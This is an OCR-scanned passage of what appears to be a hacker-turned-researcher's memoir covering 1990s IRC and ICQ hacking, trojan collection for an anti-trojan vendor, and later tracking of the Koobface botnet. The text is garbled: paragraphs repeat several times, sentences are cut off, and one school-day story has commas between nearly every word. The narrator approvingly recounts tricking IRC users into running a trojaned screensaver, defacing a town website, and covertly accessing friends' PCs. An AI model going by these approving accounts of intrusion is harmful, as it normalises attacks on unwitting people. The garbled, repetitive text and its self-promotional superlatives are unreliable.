on his favorite team including daily going through photos and possibly video material to show- 
case his favorite team at the time. Among the most venerable experienced he first discovered 
prior to getting connected is to search for UFO photos and information on the KGB including 
the active reproduction of sound using his external speakers in a MIDI-dominated World at the 
time. The most venerable and unforgettable experience at the time was the fact that he had 
access to an email which he used to keep in touch with the Internet Service Provider’s system 
administrator so that he could keep in touch with him including the active sharing of new Web 
site links for him to visit and exchange communication. 


Among the next most prominent and key features of the Internet which | used at the time 
was ICQ in particular the fact that the messages from my hometown traveled to the capital 
of the country in real-time which was particularly impressive in particular the fact that | was 
receiving immediate responses to my messages. It was fairly logical to conclude that the 
active exchange of messages on ICQ and actual contacts was crucial to becoming popular 
and actually attempting to own the Scene. What | practically did at the time was to request 
several of my friends which were known to have been involved in the Scene at the time to 
forward and exchange a decent set of ICQ contacts of fellow members of the Scene which 
quickly empowered me with the necessary contacts to join several hacking groups in particular 
HackHouse and the Social Engineering Project where | was proud to be a member of. 
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Among the first groups which | really joined at the time was Toxic Crisco which basically repre- 
sented a group of individuals involved in a variety of online activities including possibly hacking 
including the SCR Project which was basically a social engineering driven hacking group where | 
was proud to be a member of in particular my active involvement in reading various high-profile 
psychology books at the time. 


For the purpose of using IRC in particular DALnet Dancho quickly gathered a copy of the popular 
mIRC including several War Scripts ICQ Bombers Nukers and Mail Bombers including trojan 
horses and quickly decided that he should start getting experienced in the world of hacking 
for the purpose of gaining knowledge and impressing his friends. Among the first channels 
that he actually joined at the time were #gay and #lesbian where he was basically portraying 
himself as another person who was basically seeking to offer a new and novel photos-based 
screensaver to a variety of individuals for the purpose of tricking them into executing the 
screensaver on their home PCs ultimately gaining access to their PCs using a popular trojan 
horse client at the time such as for instance Sub/7. 


It would be fairly easy to assume how things got complicated with Dancho quickly obtaining 
access to Internet Relay Chat’s primary mIRC application including a variety of IRC-based “War 
Scripts” including a dozen of mail-bombers and various other ICQ-based type of Nukers and 
Flooders on his way to demonstrate a proper technical know-how to his friends and peers in the 
shady world of hacking. Among the first channels he tried to access were #hacker #hackers 
#hacking and the infamous #hackphreak on EFNet including to actually open several personal 
channels on the local IRC networks including #drugs #KGB and #linuxsecurity. At a later stage 
he actually managed to ask a friend for a possible operator status on the local town’s IRC 
channel where he was basically running a 24/7 online protection bot known as xploit including 
the active use of a Socks5 server which at the time was offered by his employer LockDownCorp 
where he was busy acting as Technical Collector of trojan horses/worms/viruses and VBS scripts 
for the purpose of improving the anti-trojan software’s signatures-based detection rates. 


Among the first thing that Dancho decided to do in his spare time is to actively research the 
local Webmaster of his hometown’s official Web site for the purpose of attempting to launch 
a social engineering attack against his local town’s official Web site which basically succeed 
and resulted in a “greeting” message being posted on the official Web site with no actual data 
destruction and data removal taking place in what would appear to be a professional approach 
when compromising a legitimate Web site for the purpose of greeting his personal friends and 
spread a message on behalf of “Trojan Hacking Group” which at the time basically consisted 
of one of his closest friends and another fellow hacker enthusiast. 


Among his responsibilities the time included the active collection of trojan 
horses/worms/viruses and VBS Scripts with the idea to share them with his employer 
which at the time was LockDownCorp one of the world’s leading anti-trojan vendors for the 
purpose of improving the detection rate for these publicly accessible trojan horses in what 
would later on mature into a successful Technical Collection operation which basically paid 
his bills and actually offered him a decent financial incentive to continue getting involved in 
security as a hacker enthusiast and actually improved his employer’s overall detection rate 
for some of the most prolific trojan horses at the time. 

The actual contractual agreement had to do with Danchousing a private FTP server where he 
would spend hours uploading collected trojan horses using his home-based dial-up connection 
and eventually earning a revenue in the process using Western Union where he was happy 
to have established direct working relationship with one of the world’s leading anti-trojans 
vendors which at the time was located at — http://proxy2.stealthedip.com/maniac/incoming/ 

Whenever Dancho would attempt to reach out to his friends he would attempt to find out 
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whether they are online using a popular trojan horse including to actually check his email 
account for their recently changed passwords and other related information including their 
current IP so that he can properly connect to their home PC for educational purposes. 


Being the World’s most notable cybercrime researcher security blogger and threat intelligence 
analyst the researcher quickly gained fame by systematically and efficiently profiling and ana- 
lyzing a decent snapshot of malicious nation-state and fraudulent activity online leading him to 
pursue a successful career as the World’s most popular cybercrime researcher security blogger 
and threat intelligence analyst. 


In an early Monday morning the researcher quickly gathered a set of research materials of the 
primary botnet that’s he’s been monitoring the infamous Koobface botnet using passive and 
active virtual SIGINT methodologies which basically include active sampling of the botnet’s 
malicious online activities using a daily set of intercepted malicious and fraudulent campaigns 
launched managed and operated by the Koobface botnet for the purpose of providing the 
necessary technical operational and strategic OSINT type of intelligence including the daily 
batch of money mule recruitment domains and campaigns which he was busy profiling with the 
idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals 
behind these campaigns. 


The Koobface botnet was the primary botnet propagating over social media at the time in 
particular Facebook and has already managed to affect tens of thousands of users globally 
potentially enticing them to interact with rogue and visual social engineering based type of 
malicious and fraudulent campaigns in the form of Fake Adobe Flash Players and fake YouTube 
videos where the ultimate goal would be to attempt to affect their friends on Facebook by 
sending automated and legitimately looking messages including links to rogue and malicious 
content. 


It’s been years since he prepared to acquire a personal computer and get connected meaning 
that he managed to prepare a list of Web sites and newsgroups on the topic of hacking and 
computer security including general Web sites that he would eventually visit. Among the first 
Web sites that he visited was NBA.com where he would quickly learn about the latest develop- 
ments on his favorite team including daily going through photos and possibly video material 
to showcase his favorite team at the time. Among the most venerable experienced he first 
discovered prior to getting connected is to search for UFO photos and information on the KGB 
including the active reproduction of sound using his external speakers in a MIDI-dominated 
World at the time. 


The most venerable and unforgettable experience at the time was the fact that he had access 
to an email which he used to keep in touch with the Internet Service Provider’s system admin- 
istrator so that he could keep in touch with him including the active sharing of new Web site 
links for him to visit and exchange communication. It’s been years since he prepared to acquire 
a personal computer and get connected meaning that he managed to prepare a list of Web 
sites and newsgroups on the topic of hacking and computer security including general Web 
sites that he would eventually visit. Among the first Web sites that he visited was NBA.com 
where he would quickly learn about the latest developments on his favorite team including 
daily going through photos and possibly video material to showcase his favorite team at the 
time. Among the most venerable experienced he first discovered prior to getting connected 
is to search for UFO photos and information on the KGB including the active reproduction of 
sound using his external speakers in a MIDI-dominated World at the time. The most venerable 
and unforgettable experience at the time was the fact that he had access to an email which 
he used to keep in touch with the Internet Service Provider’s system administrator so that he 
could keep in touch with him including the active sharing of new Web site links for him to visit 
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and exchange communication. 


Among the next most prominent and key features of the Internet which I used at the time 
was ICQ in particular the fact that the messages from my hometown traveled to the capital 
of the country in real-time which was particularly impressive in particular the fact that | was 
receiving immediate responses to my messages. It was fairly logical to conclude that the 
active exchange of messages on ICQ and actual contacts was crucial to becoming popular 
and actually attempting to own the Scene. What | practically did at the time was to request 
several of my friends which were known to have been involved in the Scene at the time to 
forward and exchange a decent set of ICQ contacts of fellow members of the Scene which 
quickly empowered me with the necessary contacts to join several hacking groups in particular 
HackHouse and the Social Engineering Project where | was proud to be a member of. 


Among the next most prominent and key features of the Internet which I used at the time 
was ICQ in particular the fact that the messages from my hometown traveled to the capital 
of the country in real-time which was particularly impressive in particular the fact that | was 
receiving immediate responses to my messages. It was fairly logical to conclude that the 
active exchange of messages on ICQ and actual contacts was crucial to becoming popular 
and actually attempting to own the Scene. What | practically did at the time was to request 
several of my friends which were known to have been involved in the Scene at the time to 
forward and exchange a decent set of ICQ contacts of fellow members of the Scene which 
quickly empowered me with the necessary contacts to join several hacking groups in particular 
HackHouse and the Social Engineering Project where | was proud to be a member of. 


Among the next most prominent and key features of the Internet which | used at the time 
was ICQ in particular the fact that the messages from my hometown traveled to the capital 
of the country in real-time which was particularly impressive in particular the fact that | was 
receiving immediate responses to my messages. It was fairly logical to conclude that the 
active exchange of messages on ICQ and actual contacts was crucial to becoming popular 
and actually attempting to own the Scene. What | practically did at the time was to request 
several of my friends which were known to have been involved in the Scene at the time to 
forward and exchange a decent set of ICQ contacts of fellow members of the Scene which 
quickly empowered me with the necessary contacts to join several hacking groups in particular 
HackHouse and the Social Engineering Project where | was proud to be a member of. 


Among the first groups which | really joined at the time was Toxic Crisco which basically repre- 
sented a group of individuals involved in a variety of online activities including possibly hacking 
including the SCR Project which was basically a social engineering driven hacking group where | 
was proud to bea member of in particular my active involvement in reading various high-profile 
psychology books at the time. 


For the purpose of using IRC in particular DALnet Dancho quickly gathered a copy of the popular 
mIRC including several War Scripts ICQ Bombers Nukers and Mail Bombers including trojan 
horses and quickly decided that he should start getting experienced in the world of hacking 
for the purpose of gaining knowledge and impressing his friends. Among the first channels 
that he actually joined at the time were #gay and #lesbian where he was basically portraying 
himself as another person who was basically seeking to offer a new and novel photos-based 
screensaver to a variety of individuals for the purpose of tricking them into executing the 
screensaver on their home PCs ultimately gaining access to their PCs using a popular trojan 
horse client at the time such as for instance Sub/7. 


Among the first groups which | really joined at the time was Toxic Crisco which basically repre- 
sented a group of individuals involved in a variety of online activities including possibly hacking 
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including the SCR Project which was basically a social engineering driven hacking group where | 
was proud to be a member of in particular my active involvement in reading various high-profile 
psychology books at the time. 


On a beautiful Thursday afternoon Dancho decided to play a decent computer game while his 
mother was busy ironing in the kid’s room and decided to take a journey successfully getting 
the World rid of hostile aliens. The game called Duke Nukem basically took Dancho on a journey 
to another World where he spend most of his afternoon getting rid of evil aliens while he led a 
discussion with his mother on his whereabouts during the day including active next-day class 
preparation and the eventual dinner conversation. While mom was busy ironing Dancho took 
on another journey to a distant World where he took care of and protected the Earth from evil 
aliens and decided that the time has come for a rest. 


Some of the most memorable memories of Dancho back in the time have to do with playing full- 
time one of the best strategy games during the 90’s that’s Sid Meier’s Civilization. Spending a 
decent portion of his time basically four hours on a daily basis Dancho quickly acquired the nec- 
essary Skills to take his civilization to a new level by waging wars developing and exchanging 
new technologies and by waging wars with competing and adversary civilizations. 


Having already mastered the power of the Civilization game Dancho quickly fell into a World 
of politics technologies and wars and successfully mapped and left a foothold in the World the 
way he knew and mastered having successfully spend a decent portion of his time playing the 
best strategy game during the 90’s that’s Sid Meier’s Civilization. Game World is something 
different. Whenever Dancho decided to play a game the World came to a halt with Dancho 
playing and learning the basics and inner workings of every game that he managed to get his 
hands on throughout the 90’s. 


Pushing the boundaries of the game at some point Dancho decided to take a deeper look at 
how you can actually make the computer’s player become more advanced and sophisticated 
and actually tried to train the Al of the game and potentially figured out a way to teach to use 
advanced warfare tactics. 


It would be fairly easy to assume how things got complicated with Dancho quickly obtaining 
access to Internet Relay Chat’s primary mIRC application including a variety of IRC-based “War 
Scripts” including a dozen of mail-bombers and various other ICQ-based type of Nukers and 
Flooders on his way to demonstrate a proper technical know-how to his friends and peers in the 
shady world of hacking. Among the first channels he tried to access were #hacker #hackers 
#hacking and the infamous #hackphreak on EFNet including to actually open several personal 
channels on the local IRC networks including #drugs #KGB and #linuxsecurity. At a later stage 
he actually managed to ask a friend for a possible operator status on the local town’s IRC 
channel where he was basically running a 24/7 online protection bot known as xploit including 
the active use of a Socks5 server which at the time was offered by his employer LockDownCorp 
where he was busy acting as Technical Collector of trojan horses/worms/viruses and VBS scripts 
for the purpose of improving the anti-trojan software’s signatures-based detection rates. 


Among the first thing that Dancho decided to do in his spare time is to actively research the 
local Webmaster of his hometown’s official Web site for the purpose of attempting to launch 
a social engineering attack against his local town’s official Web site which basically succeed 
and resulted in a “greeting” message being posted on the official Web site with no actual data 
destruction and data removal taking place in what would appear to be a professional approach 
when compromising a legitimate Web site for the purpose of greeting his personal friends and 
spread a message on behalf of “Trojan Hacking Group” which at the time basically consisted 
of one of his closest friends and another fellow hacker enthusiast. 
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Among his’ responsibilities the time included the active collection of trojan 
horses/worms/viruses and VBS Scripts with the idea to share them with his employer 
which at the time was LockDownCorp one of the world’s leading anti-trojan vendors for the 
purpose of improving the detection rate for these publicly accessible trojan horses in what 
would later on mature into a successful Technical Collection operation which basically paid 
his bills and actually offered him a decent financial incentive to continue getting involved in 
security as a hacker enthusiast and actually improved his employer’s overall detection rate 
for some of the most prolific trojan horses at the time. 


The actual contractual agreement had to do with Dancho using a private FTP server where he 
would spend hours uploading collected trojan horses using his home-based dial-up connection 
and eventually earning a revenue in the process using Western Union where he was happy 
to have established direct working relationship with one of the world’s leading anti-trojans 
vendors which at the time was located at — http://proxy2.stealthedip.com/maniac/incoming/ 


Whenever Dancho would attempt to reach out to his friends he would attempt to find out 
whether they are online using a popular trojan horse including to actually check his email 
account for their recently changed passwords and other related information including their 
current IP so that he can properly connect to their home PC for educational purposes. 


Being the World’s most notable cybercrime researcher security blogger and threat intelligence 
analyst the researcher quickly gained fame by systematically and efficiently profiling and ana- 
lyzing a decent snapshot of malicious nation-state and fraudulent activity online leading him to 
pursue a successful career as the World’s most popular cybercrime researcher security blogger 
and threat intelligence analyst. 


Back in 2007 | got a direct invitation to attend a private and invite-only conference event held 
by the Honeynet Project at the U.K’s GCHQ which | actually attended and presented on a variety 
of topics including current and emerging cybercrime trends and actually got the opportunity 
to meet with the folks from the Honeynet Project. 


In 2008 | got a surprise invitation to join the team at ZDNet a web site portal which | greatly 
admired while | was busy working for https://astalavista.com and | was in fact visiting on a 
daily basis where | spend a highly professional and productive 4 years as a security blogger at 
ZDNet’s Zero Day blog leading to me to thousands of publications including an actual award- 
winning Jessy H. Neal Award for working on ZDNet’s Zero Day blog. 


Working for ZDNet greatly shaped my professional well-being in a way that | was basically work- 
ing with top-notch technology experts from across the globe and actually had the chance to 
contribute with personal content and research for a period of four years which was an unfor- 
gettable experience and it’s still a pleasure and a honor to touch base and actually find a way 
to contribute and say hi to the people that | used to work with back in 2008. 


At some point in time | eventually got invited to attend a private and invite-only conference 
where | presented on money mule recruitment practices and eventually got the privilege to 
meet most of the people that | work with on a face-to-face basis where we hang out and 
actually socialized and discussed various hot topics and cybercrime trends internationally. 


Dancho began his career in the world of Intelligence Studies greatly provoked by research pub- 
lished and distributed by a U.S based company known as iDefense which basically specializes 
in profiling online hacktivism activity and is basically capable of producing high-quality and 
never-published before threat intelligence and general intelligence briefs. Among the key re- 
ports that Dancho was able to get his hands on was the U.S/China skirmish which basically 
consisted of various U.S and Chinese based groups actively interacting online by launching 
DDoS (Distributed Denial of Service) attacks against their infrastructure and participating in 
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Web site defacement campaigns. He would then research and actively visit the CIA.gov’s offi- 
cial Web site including FAS.org and NSA.gov seeking manuals and research material on Open 
Source Intelligence (OSINT) which would later on greatly contribute to help him become one of 
the World’s leading experts in the field of cybercrime research and threat intelligence gather- 
ing. 

In an early Monday morning the researcher quickly gathered a set of research materials of the 
primary botnet that’s he’s been monitoring the infamous Koobface botnet. His main motiva- 
tion behind tracking down and monitoring one of the most prolific botnet that was spreading 
across Facebook at the time was to assist the Security Industry and researchers internationally 
including U.S law enforcement on their way to keep track of the botnet’s activities and eventu- 
ally attempt to take it offline and actually attempt to track down some of the authors behind 
it. 

Dancho’s daily routine consisted of checking the most recent campaigns launched by the gang 
and actually offer in-depth technical analysis on the latest campaigns publicly disseminating 
and profiling the campaigns at his personal blog leading him to a specific set of detailed and 
in-depth analysis of the Koobface botnet one of the few publicly accessible analysis resources 
on the topic at the time. 


The botnet masters at the time were basically known to keep track of Dancho’s research and 
eventually left a message embedded in the actual C &C infrastructure basically greeting the 
researcher for his research including a second and a third message during the Christmas season 
including an actual point-by-point response to his “Top 10 Things You Didn’t Know About the 
Koobface Gang” article which he published at ZDNet’s Zero Day blog. 


At a later stage he would present his findings in a Keynote Presentation at CyberCamp 2016 
on the topic of “Exposing Koobface — The World’s Largest Botnet” in front of a high-quality 
audience and actually discuss in-depth how he tracked it down and eventually attempted to 
take it offline. 


While he was busy studying in the Netherlands he became familiar what appeared to be one 
of the most popular Web sites for hackers on the Web known as Astalavista.com where he 
managed to actually find the real company behind the portal and actually approached. 


In 2021 | can be reached at ddanchev@cryptogroup.net including my personal blog — 
https://ddanchev.blogspot.com including the infamous — https://astalavista.box.sk where I’m 
currently running a high-profile hacking and security project. 


The primary purpose behind the actual release of my personal memoir is to reach out to to a 
new set of audience and actually elaborate more on my experience and expertise in the field 
including to offer a God’s Eye perspective on the current and emerging cybercrime ecosystem 
in combination with active case studies and technical material whose purpose is to greatly 
assist everyone that’s reading this memoir with the idea to provoke you to share it with your 
friends and colleagues including t 


It used to be a moment in time when we used to "rock the boat". With or without the drinks. 
Following a successful career as a hacker enthusiast during the 90’s and a successful man- 
agement and operation of one of the World’s leading portals for hackers and security experts 
which is https://astalavista.com for a period of three years circa 2003-2006 when | originally 
decided to launch one of the security industry’s leading publication which is my personal blog - 
https://ddanchev.blogspot.com | managed to somehow land a successful career as an indepen- 
dent contractor in the world of security blogging cybercrime research and threat intelligence 
which led me to visit several invite-only conferences including to present at event at an undis- 
closed location including to actually attract and retain approximatelly 6M page views which is 
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not necessarily bad for a man one operation in terms of running and maintaining my personal 
blog for a period of 12 years. 


Among the primary reasons for coming up with this 111 pages long personal memoir is to em- 
power fellow researchers and security experts including the general public with an in-depth 
personal account overview of my experience in the security industry’s as a teenage hacker 
enthusiast back in the 90’s today’s most popular and often cited security blogger threat in- 
telligence analyst and cybercrime researcher internationally and to present a diverse set of 
high-quality and never-published and discussed before case studies and enriched technical in- 
formation and OSINT data on current and emerging cyber attack trends. The primary goal of 
the book would be to position my memoir as one of the most popular and often cited personal 
account of the hacking and the security Scene circa the 90’s through the prism of my teenage 
hacker experience up to present day in terms of various high-profile and advanced nation-state 
actors and malicious and fraudulent cyber attack campaigns where the ultimate goal would be 
to discuss in-depth my experience in the field of security blogging threat intelligence gathering 
and cybercrime research throughout the past decade. It used to be a moment in time when 
“sharing was caring” and with the booming Web 2.0 enterprises and the actual concept numer- 
ous new online participants and Web 2.0 darlings started popping up as mushrooms another 
set of individuals prone to make a change an impact quickly emerged online potentially shar- 
ing a treasure trove of personal knowledge into the world of modern technologies including the 
very basics of information security hacking and cyber warfare including a newly releases and 
never-published before research into the area of cybercrime research and the actual process 
of profiling the bad guys onlines in terms of their actual campaigns and actual malicious infras- 
tructure behind their online campaigns. It used to be a personal privilege back in December, 
2005 when | originally launched my personal Dancho Danchev’s Blog - Mind Streams of Infor- 
mation Security Knowledge blog which quickly attracted a high-quality and relevant audience 
which is currently one of the security industry’s most popular and relevant security hacking OS- 
INT and threat intelligence including cybercrime research type of gathering online publications 
where I’ve continued to publish and post high-quality and never-published before and released 
research and analysis articles. At some point in time | got practically used to getting referenced 
and quoted by mainstream news media in terms of my research which greatly motivated an 
inspired me to continue doing my research an to actually attempt to inspire other researchers 
and readers to continue reading and visiting my blog on a daily basis where | owe everyone a 
big deal of thanks for the daily visits and for actually bothering to read my articles and actually 
go through my research at the time up to present day. Tracking down and monitoring the Koob- 
face botnet on a daily basis where | successfully became the primary source of information on 
the Koobface botnet at the time was quite a success and a pretty interesting experience where 
| ultimately managed to take it offline including to held a Keynote presentation on the topic of 
monitoring and tracking down of the Koobface botnet 


Following a series of messages left on the actual C &C (Command and Control) server locations 
which were basically greeting me and referencing my research at the time including a series 
of typosquatted domains using my name at some point in time | managed to actually come up 
with a proper "Top 10 Things You Didn’t Know About the Koobface Gang" article for ZDNet at the 
time where the botnet masters actually left a message within the C &C (Command and Control) 
server location basically answering the key points on a point by point basis which was quite a 
success at the time of monitoring and tracking down the Koobface botnet. The primary purpose 
behind the actual release of my personal memoir is to reach out to to a new set of audience 
and actually elaborate more on my experience and expertise in the field including to offer a 
God’s Eye perspective on the current and emerging cybercrime ecosystem in combination with 
active case studies and technical material whose purpose is to greatly assist everyone that’s 
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reading this memoir with the idea to provoke you to share it with your friends and colleagues 
including to actually recommend it to your friends and colleagues. 


Back in the day my primary area of occupation was to monitor and track down the Koobface 
botnet where | was basically acting as the primary source of real-time and actionable intel- 
ligence on the whereabouts of the Koobface botnet including to actually profile and analyze 
some of their latest campaigns which led to a variery of pretting interesting situations where 
they’ve actually redirected Facebook’s entire IP space to my personal blog including to actually 
leave several greeting within the botnet’s C &C channel in terms of sending me a message and 
greeting me including a step by step response to my "Top 10 Things You Didn’t Know About the 
Koobface Gang" article where they actually responded to my ZDNet article at the time in a step 
by step fashion. At a specific point in time | was originally invited to held the Keynote presen- 
tation at the CyberCamp 2016 security conference where | presented on the topic of tracking 
down and monitoring the Koobface one of the world’s largest botnets which was a tremendous 
success in the context of communicating most of my research to a wider audience. 


Back in 2011 while | was busy living in another town | actually met with a NYTime reporter 
for the purpose of catching up and elaborating more on my research on the Koobface botnet 
which was quite a success in terms of communicating my findings to a proper party which 
eventually led to a high-profile quote on my research on the Koobface botnet in the original 
NYTimes.com At a specific point in time my primary area of occupation included the active 
monitoring and taking down of the Koobface botnet which at the time was the only active 
social media propagating botnet that was successfully targeting Facebook in terms of spreading 
malicious software across the social media platform sucessfully affecting its users. The gang 
then continued its underground marketplace activities by starting to serve client-side exploits 
to users visiting major Koobface Web properties that also includes fake YouTube including Flash 
Player serving Web sites part of the Koobface botnet. 


During the 90’s | had the privilege to own a personal computer among the few kids on the 
block that really had a personal PC at their place which at the time was an IBM clone known as 
Pravetz 16 which basically allowed me to explore the world of computers and technology while 
working with various files and actually spending most of my time playing computer games. | 
started getting involved in the world of hacking largely provoked by several movies such as for 
instance the original "Hackers" movie including the buzz around the very idea of compromis- 
ing and penetrating another person or organization’s PC seeking intellectual exploration as a 
basic motivation factor. Among my primary bookmarks at the time were htps://textfiles.com 
including Box.sk and https://astalavista.box.sk including Progenic.com and naturally packet- 
stormsecurity where | was busy going through the news on a daily basis potentially getting 
myself motivated by some of the latest web site defacements of high-profile Web sites around 
the globe. 


Among my first contributions in the field were several text files including the production of 
two issues of Trojan Defense Suite’s Newsletter and the production of the security newsletter 
for Blackcode.com including several papers detailing the basics of trojan horses and how to 
use them including how to protect yourself against them including several text files in various 
categories including papers on anarchy. What | was particularly famous at the time with is the 
production of "The Complete Windows Trojans Paper" which at the time was the only and most 
popular text file explaining the basics of trojan horses and to protect yourself against them. 
Something else | was particularly popular with was my personal online hacking and security 
files repositiory which was actually featured on several top lists for hacking and security web 
sites including Progenic.com where | was getting a lot of traffic and there were actually quite 
a lot of people voting for my personal web site and supporting it. | was also specifically well 
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known for producing several issues of the security newsletter for Blackcode.com which was a 
top and high-profile high-traffic visited portal for hacking resources back in the 90’s where | 
had the privilege to produce the portal’s security newsletter and contribute with actual articles 
on the topic. 


Quickly, entering, the, premises, of, the, doorway, Sten, yelled at, next door, neighbor, best, 
friend, and, both, quickly, left, the, premises, and, gathered, to, ask, for, more, of, his, friends, 
ready, to, go, to, school. Jesebelle, quickly, noticed, the, two, of, them, coming, their, way, 
and, carefully, prepared, to, go, to, school. On their way, they, met, Constantine, who, waited, 
for, them, to, gather, on, their, way, to, school. 


Preparing, for, the, day, was, quite, a, gathering. Sten, entered, the, front, door, of, the, school, 
followed, by, Jezebelle and Constantine, and, his, best, friend, next, door, neighbor, Gater. Fol- 
lowed, by, the, most, of, the, students, back, there, the, class-mates, entered, the, classroom, 
and, sat, on, the, desk, table, ready, for, school. Fist, thing, Sten, did, was, to, prepare, for, 
class. He, unpacked, his, belongings, and, got, ready, thinking, about, what, he’ll do, once, 
he, gets, back, home, sitting, in, front, of, his computer. The class, was, quite, a, gathering, 
with, all, of, his, classmates, entering, the, classroom, followed, by, their, friends, and, the, 
teacher. The class, began, followed, by, most, of, his, classmates, entering, the, room, with, 
the, teacher, slowly, checking, who’s present, and, who’s not. First, things, come, first, with, 
the, teacher, slowly, checking, who’s, about, to, share, his, lesson. 


First, thing, Sten, did, was, to, think, of, his, computer, back, home, a cozy, feeling, of, self- 
preservation, and ultimate, self-being, Sten, felt, the, power, of, his, loneliness, and, started, to, 
image, the, things, he'll, do, when, he, comes, back, home. The teacher, Mrs, Jozefine, quickly, 
realized, that, several, students, need, to, tell, their, lesson, and, started, asking, who’s, de- 
cided, to, tell, their, lesson, first. Sten, quickly, decided, to, share, a, feeling, of, comfortability, 
with, his, next, desk, neighbor, and, quickly, smiled, thinking, about, all, the, things, he'll, do, 
when, he, gets, back, home. A, perfect, surrounding, and, a, room, full, of, personal, belong- 
ings, quickly, drove, Sten, to, realize, the, vast, potential, of, his, personal, mindset, allowing, 
him, to, consider, the, possibility, of, all, the, things, he’ll, do, when, he, gets, back, home. 
His students, quickly, realized, that, the, time, to, tell, their, lesson, has, come, and, prepared, 
to, get, asked, by, their, teacher, about, everything, they, learned, about, their, lesson. First, 
things, come, first, with, several, of, his, classmates, getting, asked, about, their, teacher, and, 
what, they, learned, about, their, lesson. 


Sten, quickly, payed, attention, to, his, classmate, getting, asked, about, his, lesson, and, 
quickly, felt, the, comfortability, of, Knowing, that, he, knew, his, lesson. Time, for, a, break, 
and, the, classmates, quickly, went, on, to, decide, on, how, to, change, rooms. While, the, 
room, was, changed, Sten, quickly, wandered, around, thinking, and, considering, the, pos- 
sibility, of, owning, a personal computer, including, the, joys, and, benefits, of, sharing, his, 
belongings, with, someone, else. Next, lesson, comes, next, the, classmates, quickly, entered, 
a, new, room, and, started, getting, prepared, for, their, class. 


The rush, through, the, hallway, quickly, embraced, Sten, and, his, friend, and, they, quickly, 
wandered, around, seeking, and, feeling, blissful, joys, of, shared, compatibility, with, the, 
surrounding, environment. Next, lesson, comes, next, and, the, friends, quickly, entered, a, 
new, room, quickly, busy, preparing, for, their, lesson. Unpacking, was, easy, a textboook, 
a, notebook, a pencil, and, various, related, materials, getting, ready, for, their, lesson. Sten, 
was, busy, considering, the, joys, of, owning, a personal, computer, and, quickly, decided, that, 
thinking, about, it, made, him, feel, even, better. Considering, the, joys, of, owing, a, personal, 
computer, was, quite, an, experience, and, Sten, felt, even, better, while, considering, the, joys, 
and, a, feeling, of, belonging, to, a, personal, need, and, self-preservation, type, of, self-being, 
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joyful, experience, allowing, him, to, further, expand, his, emotional, feeling, of, belonging, to, 
a, Surrounding, environment, including, his, friend. 


With, lessons, about, to, get, over, Sten, and his, friend, decided, that, time, for, home, was, 
even, better, and, they, quickly, wandered, around, figuring, a way, to, find, the, hallway, as, 
they, decided, to, go, back, home. The trip, was, quite, a, pleasant, surprise, with, both, of, 
them, walking, the, same, path, as, they, walk, on, an occasional, basis, as, they, decided, that, 
time, for, home, was, even, better. Entering, the, hallway, was, quite, an, experience, and, 
both, of, them, feeling, a feeling, of, belonging, quickly, entered, the hallway, and, decided, 
that, time, for, home, was, even, better. 


Quickly, packing, the, bags, was, easy, as, a lot, of, friends, decided, that, time, for, home, 
was, even, better, as, they, decided, that, time, for, home, was, even, better. Quickly, decided, 
that, time, for, home, was, even, better, Sten, and his, friend, quickly, packed, their, bags, and, 
went, on, to, see, their, friends, as, they, decided, that, time, for, home, was, even, better. 


Slowly entering the premises of what can be best described as home, grandma was quick to 
prepare lunch a cozy feeling of home-belonging and a warm fireplace feeling of personal self- 
belonging. While paying attention to what Sten managed to achieve during the day, grandma 
payed attention to his lesson by a personal feeling of belonging to what Sten would do next 
during the afternoon. Sitting and watching right behind him, grandma took the time and effort 
to pay attention to his lesson and a personal feeling of self-belonging quickly started to take 
place prompting Sten to learn his lesson even faster. The TV quickly ran a story following a 
placement of an animated cartoon aired on Ostankino a Russian national-TV back in the time 
called “Maya” the Bee. 


The time has come to play a game. Sten quickly powered his 16-bit Pravetz PC 2MB RAM and 
a screen full of computer game choices quickly appeared prompting him to choose a game. 
While loading a relatively known game known as Scorch Sten decided to play two hours and 
then proceed with meeting his friends and start a discussion with his grandma. A huge fan of 
strategy games Sten decided that he didn’t have the time to dedicate to play his favorite game 
- Sid Meier’s Civilization and instead he figured that he would eventually play the game later 
throughout the day. Playing Scorch was quite an experience and he took a few hours of his 
precious learning time to interact with the game. He then decided to approach his best friend 
at the time and co-conspirator in the World of UFO’s the Soviet Union and computer games 
including the hacking Scene - George Kadiysky for two hours of extensive game play where we 
would strategize on how to best “approach” the Soviet Union in terms of invasion actively and 
carefully planning every move on our way to invade the Soviet Union and eventually all the 
surrounding countries. While | was busy preparing for our several hour game play 


George was supposed to be busy going through a CD which was basically a mirror of Packet- 
stormsecurity in particular the E-Zine section so that we can prepare to have a conversation 
in terms of working out our technological and military strategy on our way to achieve global 
domination in the original Sid Meier’s Civilization. What we basically did in the beginning was 
to strategize and actually get a better view of the technology tree of the game and while | was 
busy moving the Empire along George was busy keeping notes on our way to keep track and 
advance out military strategy on a “first come first serve” basis. 


Getting Connected 


Provoked by the need to reach out to a vast network of computers known as the Internet - Sten 
quickly decided that the time has come to get connected - so that he decided to seek a proper 
connection provider in his local home-town. Back in the day the primary connection providers in 
the time were Bulgaria’s Digital Systems BIA Net and the country’s leading mobile connectivity 
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provider - Mtel’s pre-paid dial-up cards. Times were different in terms of connectivity and DSL 
and ADSL were a dream come true in the face of corporate networks properly utilizing and 
using ISDN type of based connectivity. Keeping it simple - Sten decided to quickly acquire the 
necessary dial-up modem - which he would eventually fall in love with potentially reaching 
out to a vast network of computers known as the Internet using the help of a local dial-up 
provider known as Digital Systems. Back in the day - hourly based dial-up access meant think 
twice about what you do and how you do it online which means that | would have to basically 
prepare a plan for the things that I'll do online including Web sites which | would have to visit 
including a set of emails which | would have to send to a set of people including friends and 
colleagues. 


It’s been years since he prepared to acquire a personal computer and get connected meaning 
that he managed to prepare a list of Web sites and newsgroups on the topic of hacking and com- 
puter security including general Web sites that he would eventually visit. Among the first Web 
sites that he visited was NBA.com where he would quickly learn about the latest developments 
on his favorite team including daily going through photos and possibly video material to show- 
case his favorite team at the time. Among the most venerable experienced he first discovered 
prior to getting connected is to search for UFO photos and information on the KGB including 
the active reproduction of sound using his external speakers in a MIDI-dominated World at the 
time. The most venerable and unforgettable experience at the time was the fact that he had 
access to an email which he used to keep in touch with the Internet Service Provider’s system 
administrator Bogdan Dochev so that he could keep in touch with him including the active 
sharing of new Web site links for him to visit and exchange communication. 


Among the next most prominent and key features of the Internet which | used at the time 
was ICQ in particular the fact that the messages from my hometown traveled to the capital 
of the country in real-time which was particularly impressive in particular the fact that | was 
receiving immediate responses to my messages. It was fairly logical to conclude that the 
active exchange of messages on ICQ and actual contacts was crucial to becoming popular 
